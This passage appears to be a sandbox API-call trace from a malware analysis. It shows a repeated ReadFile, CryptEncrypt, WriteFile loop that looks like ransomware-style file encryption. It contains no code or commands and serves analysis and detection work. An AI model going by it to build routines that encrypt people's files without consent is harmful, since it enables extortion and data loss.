dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.652] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.652] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.652] GetLastError () returned 0x0 [0151.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.653] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.653] GetLastError () returned 0x0 [0151.653] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.653] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.654] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.654] GetLastError () returned 0x0 [0151.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.654] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.655] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.655] GetLastError () returned 0x0 [0151.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.655] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 [0151.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.656] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.656] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.656] GetLastError () returned 0x0 